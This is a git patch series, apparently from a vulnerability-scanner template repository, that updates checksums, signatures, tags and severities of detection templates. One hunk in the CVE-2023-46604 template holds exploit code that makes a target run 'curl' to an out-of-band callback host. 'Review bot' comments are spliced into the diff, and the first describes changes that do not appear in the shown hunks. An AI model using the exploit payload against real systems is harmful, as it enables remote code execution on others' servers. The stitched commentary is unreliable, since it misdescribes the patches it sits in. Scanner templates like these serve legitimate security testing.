file/keys/dependency/dependency-track.yaml file/keys/docker/dockerhub-pat.yaml From 1b191f5fc4d2361a13e2fdc6370ea336848d2603 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 17:44:22 +0000 Subject: [PATCH 42/86] Auto Generated Templates Checksum [Wed Mar 20 17:44:22 UTC 2024] :robot: --- templates-checksum.txt | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6048164bfe..e2f8d3cfd0 100644 --- a/templates-checksum.txt 
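Review bot: After the second hunk (`@@ -21,10 +24,6 @@`) deletes the `- type: status` matcher, `matchers:` holds a single word matcher, so the `matchers-condition: and` context line in the first hunk no longer combines anything and is dead configuration; either remove it or, if the goal was only to stop rejecting non-200 pages, keep a status matcher with a wider list instead of none. Without any status filter the template will now report a version from 4xx/5xx error responses too, which may be intended but deserves a line in `description`. The new `host-redirects: true` / `max-redirects: 4` pair means the response that is matched and the `Server` header the kval extractor reads can come from a redirect target rather than the scanned host; a comment above those keys such as `# follow redirects (including to other hosts) so the final IIS response is fingerprinted` would record that trade-off. The word matcher's `part:` line falls between the two hunks and is not visible here, so whether the match is confined to headers is inferred.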
+++ b/templates-checksum.txt @@ -105,8 +105,8 @@ config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 config/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:51d8ac58d8ffdf6cfd4660d3e19373bb08bb6605 -cves.json-checksum.txt:fdca644f563bcfe217c57881fc5991db50a942e4 +cves.json:3b21f179e553a113562af785def57c341b663071 +cves.json-checksum.txt:e03adc785e821e31dd4936f083dc56fbb0b302df dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -123,9 +123,10 @@ dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b +dns/spf-record-detect.yaml:d284769413067e7c7fdfa930502a15242a628703 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 -dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 +dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891 file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8 
@@ -4536,7 +4537,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 -http/exposures/files/generic-db.yaml:1f5cc209039fbe3d53d29286d46bea2e8ffada19 +http/exposures/files/generic-db.yaml:36dc57f7db3eac512d56d7d54f0bb767cbb7fe88 http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e @@ -6681,7 +6682,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 -http/technologies/wing-ftp-service-detect.yaml:416707a344d027b1224855a9c085642fadcccf38 +http/technologies/wing-ftp-service-detect.yaml:0df5cbc14e688f4a21fb88751550ed2dc27e5497 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900 
@@ -8175,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0bd557ae0e24c541eae22a598daa4f74b79cfd0f +templates-checksum.txt:5e70b10373bd2e373d9301a4b8dcb1c3b77889b1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2d38339db725bdb9c6035f8b2a6b7f9bd4111f7e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 17:44:52 +0000 Subject: [PATCH 43/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 52ff2ed46f..9f93d3bc1e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'dns/soa-detect.yaml' + - 'dns/spf-record-detect.yaml' - 'dns/txt-service-detect.yaml' - 'file/keys/dependency/dependency-track.yaml' - 'file/keys/docker/dockerhub-pat.yaml' From a61b8cb7f77b5b87f62a7ea5552d6e92f8ff2079 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 17:46:15 +0000 Subject: [PATCH 44/86] Auto Template Signing [Wed Mar 20 17:46:15 UTC 2024] :robot: --- dns/spf-record-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml index c5583ab23a..7a9a051fd7 100644 --- a/dns/spf-record-detect.yaml +++ b/dns/spf-record-detect.yaml 
@@ -22,3 +22,4 @@ dns: - type: regex regex: - "v=spf1(.+)" +# digest: 4b0a00483046022100ada13ee531e36c1b45b196bafc39386d03ee223d98f9d0c3d3bd6f0609c6101202210099f776bb4a582a65c321385adc3d8fa9ec6f3047e658c38c6da98c89dd82c7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 603a75175f8e5ec5b0e62f06d5a1af95111c584d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 18:18:58 +0000 Subject: [PATCH 45/86] Auto Generated Templates Checksum [Wed Mar 20 18:18:58 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e2f8d3cfd0..6ba563c418 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -123,7 +123,7 @@ dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b -dns/spf-record-detect.yaml:d284769413067e7c7fdfa930502a15242a628703 +dns/spf-record-detect.yaml:6aad264acb43bab9f128417e59b116cb7b35868e dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1 
@@ -6431,7 +6431,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5 -http/technologies/fingerprinthub-web-fingerprints.yaml:27e666a6c70080629b106d8a7549a69b04e80292 +http/technologies/fingerprinthub-web-fingerprints.yaml:395162bda66fdf4f6e2de47431c5200fe145dfa5 http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5e70b10373bd2e373d9301a4b8dcb1c3b77889b1 +templates-checksum.txt:c39f1ef0b33169857d5d46a8397b6894d92ff8a4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 50de72defbbbc03e31c92014bfb93d37c5b60b06 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 18:20:56 +0000 Subject: [PATCH 46/86] Auto Template Signing [Wed Mar 20 18:20:56 UTC 2024] :robot: --- http/technologies/fingerprinthub-web-fingerprints.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/fingerprinthub-web-fingerprints.yaml b/http/technologies/fingerprinthub-web-fingerprints.yaml index afff283113..ca2ef4cc89 100755 --- a/http/technologies/fingerprinthub-web-fingerprints.yaml 
+++ b/http/technologies/fingerprinthub-web-fingerprints.yaml @@ -15065,4 +15065,4 @@ http: words: - "x-dispatcher:" case-insensitive: true -# digest: 4a0a00473045022100e202b5b8367df139a20f5ff3fced4c3ec57f5c5c98c2c42e3079952ccc4cf87502204d5331301337b21ea90535286f9393bc4140b0fde578aef1869201af8fca701e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc94744c796eb79eba218d1c041ec0e817654420bfc1a1c188d90dcfc8506dcc0221008763af93a66376ac9b4dbee14f6d8a1db56f84bfc29474faefd0f50ffd68ea6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 994d44ecf799788482d8950df621e2eceffca47c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 19:19:36 +0000 Subject: [PATCH 48/86] Auto Generated Templates Checksum [Wed Mar 20 19:19:36 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6ba563c418..b1f3af28bf 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6431,7 +6431,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5 -http/technologies/fingerprinthub-web-fingerprints.yaml:395162bda66fdf4f6e2de47431c5200fe145dfa5 +http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 
@@ -6537,7 +6537,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06 http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81 -http/technologies/microsoft/microsoft-iis-version.yaml:879e7e413c5a14c9f8d60c781d1a2d6e14082a0c +http/technologies/microsoft/microsoft-iis-version.yaml:388eeed4e41d6681d1715a232292e33ee19e1ae3 http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7 http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69 http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c39f1ef0b33169857d5d46a8397b6894d92ff8a4 +templates-checksum.txt:30add9985a0dfd3be88361eb34dcd71c7d70f2c6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 516ef9acd478f987368a317691e0a18d4dd3b1c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 19:21:17 +0000 Subject: [PATCH 49/86] Auto Template Signing [Wed Mar 20 19:21:17 UTC 2024] :robot: --- http/technologies/microsoft/microsoft-iis-version.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) 
diff --git a/http/technologies/microsoft/microsoft-iis-version.yaml b/http/technologies/microsoft/microsoft-iis-version.yaml index ac03e25967..d85e1c2ad9 100644 --- a/http/technologies/microsoft/microsoft-iis-version.yaml +++ b/http/technologies/microsoft/microsoft-iis-version.yaml @@ -29,5 +29,4 @@ http: part: header kval: - Server - -# digest: 490a0046304402204aec8d1c4678a40a8ca831d952b351c4ca885fb845222a559099426e6a27ba9602204f9487670472a494fcecc37f1ebc08e68f6c3007de6fae438c5f5b7210e66a87:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207a63b4fb5117f7f1168ba477b97deaa35e7e38c9355639a7df7c8f6f54fa960c022100e3d3f3c25ecff01f75a723ca2df3e64e5ea725d7cc61f70ef54e41f6899fc359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 02c060a8e43fdcd8dfd34b0cf7369559fe3b900b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com> Date: Thu, 21 Mar 2024 08:29:27 +0800 Subject: [PATCH 50/86] fix tag CVE-2012-4253.yaml --- http/cves/2012/CVE-2012-4253.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index cc95c455b2..046f3fb2ab 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mysqldumper product: mysqldumper - tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss + tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper http: - method: GET 
@@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 From 0c131b2eac88b33ac1d0059f790327224381deca Mon Sep 17 00:00:00 2001 From: mzack Date: Thu, 21 Mar 2024 02:57:08 +0100 Subject: [PATCH 51/86] fixing faulty template --- javascript/cves/2023/CVE-2023-46604.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index 40231ce6c3..e7326fd2cf 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -40,7 +40,7 @@ javascript: let b = m2.Buffer(); let name=Host+':'+Port; let conn = m1.Open('tcp', name); - let randomvar = '{{randstr}}' + let randomvar = '{{randstr}}'.toLowerCase(); var Base64={encode: btoa} exploit_xml=`http://${oob}/b64_body:`+Base64.encode(' bash-ccurl http://$(echo '+randomvar+').'+oob+' ') +'/' packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010" From a2b5863af447952626bd9d9282ec1c6780fc4724 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 05:00:49 +0000 Subject: [PATCH 53/86] Auto Generated Templates Checksum [Thu Mar 21 05:00:49 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b1f3af28bf..07d57b29ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt 
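Review bot: The new `.toLowerCase()` on `randomvar` is not explained anywhere in the hunk, and the commit title only says the template was faulty. `randomvar` is placed as a DNS label in front of `oob`, and the template's final check compares the stored value against the interactsh request (visible in the PATCH 66 hunk), so the fix presumably makes the stored value agree with a case-folded DNS name; a comment such as `// lowercased: used as a DNS label, so it must match the case-folded callback` on the new line would record that. The surrounding JavaScript function starts and ends outside this hunk.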
@@ -976,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923 -http/cves/2012/CVE-2012-4253.yaml:8191f7e69d1dbec2c0b9ea2f687eafa87eeb2214 +http/cves/2012/CVE-2012-4253.yaml:93bd7e8a7190482cf491b58ff39abf24dc655387 http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841 http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5 http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7 @@ -6537,7 +6537,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06 http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81 -http/technologies/microsoft/microsoft-iis-version.yaml:388eeed4e41d6681d1715a232292e33ee19e1ae3 +http/technologies/microsoft/microsoft-iis-version.yaml:dcf1fea08a8e195fb4fb800bddc0355619141c06 http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7 http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69 http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8 
@@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:30add9985a0dfd3be88361eb34dcd71c7d70f2c6 +templates-checksum.txt:05e0c517f0d08f9334bb67bf6c18a1ccafde36eb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cf8cd4f27a74fa4712a830672ea5b888b88b17c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 05:02:28 +0000 Subject: [PATCH 54/86] Auto Template Signing [Thu Mar 21 05:02:28 UTC 2024] :robot: --- http/cves/2012/CVE-2012-4253.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 046f3fb2ab..fbe3a390e6 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100de6cb5ae696eb8f0b8837ff02b5e53e8049e806e0253c9933027f7da28634071022100fc1518b608713661374a7f1ebd5ef01b8816925196928a73aa3882adf5bf8192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d28d819eecb2b12a4da86b4f7a2d9103bc211d35 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 21 Mar 2024 12:20:10 +0530 Subject: [PATCH 55/86] fix-formatting --- http/exposed-panels/softether-vpn-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
diff --git a/http/exposed-panels/softether-vpn-panel.yaml b/http/exposed-panels/softether-vpn-panel.yaml index 3ec9615e2f..eb18a9aa34 100644 --- a/http/exposed-panels/softether-vpn-panel.yaml +++ b/http/exposed-panels/softether-vpn-panel.yaml @@ -4,7 +4,8 @@ info: name: SoftEther VPN Panel - Detect author: bhutch severity: info - description: SoftEther VPN panel was detected. + description: | + SoftEther VPN panel was detected. metadata: max-request: 1 verified: true From b1b540179aa297e2f3c9767d174d126eed204917 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 21 Mar 2024 13:08:19 +0530 Subject: [PATCH 56/86] Update drupal-install.yaml --- http/exposures/files/drupal-install.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/files/drupal-install.yaml b/http/exposures/files/drupal-install.yaml index 6bc4fa3159..bc154f9f53 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/exposures/files/drupal-install.yaml @@ -3,7 +3,7 @@ id: drupal-install info: name: Drupal Install author: NkxxkN - severity: low + severity: critical description: Drupal Install panel exposed. metadata: max-request: 2 @@ -23,4 +23,4 @@ http: - type: word words: - "Choose language | Drupal" -# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 From 0cd4e5a335c7675189e58fd588aca060a6316af0 Mon Sep 17 00:00:00 2001 
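Review bot: `severity` jumps from `low` to `critical` in the drupal-install hunk while `description: Drupal Install panel exposed.` still states no impact, and PATCH 57 then lowers it to `high`, so neither rating can be checked against what the template finds. A description that says why a reachable installer rates that high (presumably that an unauthenticated visitor can complete or redo the setup — confirm; no `reference:` is listed to check against) would make the severity reviewable, and a `reference:` entry would help the same way. The block form `description: |` used for the softether template in the first hunk of this line would also keep the file consistent with the formatting pass in the same series.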
From: Dhiyaneshwaran Date: Thu, 21 Mar 2024 13:11:35 +0530 Subject: [PATCH 57/86] Update and rename drupal-install.yaml to drupal-install.yaml --- .../files => misconfiguration/installer}/drupal-install.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/{exposures/files => misconfiguration/installer}/drupal-install.yaml (91%) diff --git a/http/exposures/files/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml similarity index 91% rename from http/exposures/files/drupal-install.yaml rename to http/misconfiguration/installer/drupal-install.yaml index bc154f9f53..282cedeb23 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/misconfiguration/installer/drupal-install.yaml @@ -3,12 +3,12 @@ id: drupal-install info: name: Drupal Install author: NkxxkN - severity: critical + severity: high description: Drupal Install panel exposed. metadata: max-request: 2 shodan-query: http.component:"drupal" - tags: exposure,drupal + tags: misconfig,drupal,install,exposure http: - method: GET From 0638540f77d37de7b8b418b6e3247f18594fe62c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 07:45:49 +0000 Subject: [PATCH 59/86] Auto Generated Templates Checksum [Thu Mar 21 07:45:49 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 07d57b29ee..1eb6877577 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt 
@@ -976,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923 -http/cves/2012/CVE-2012-4253.yaml:93bd7e8a7190482cf491b58ff39abf24dc655387 +http/cves/2012/CVE-2012-4253.yaml:22bb780ede0f6ee252aa15a98a2b1c8d437494e4 http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841 http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5 http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7 @@ -4528,7 +4528,6 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38 http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9 http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272 http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4 -http/exposures/files/drupal-install.yaml:becf211637e4dbbe6b1f0fa018d53f4ea23de648 http/exposures/files/ds-store-file.yaml:679fb351af4567e417c0697f8d3298ddc14767b4 http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4 
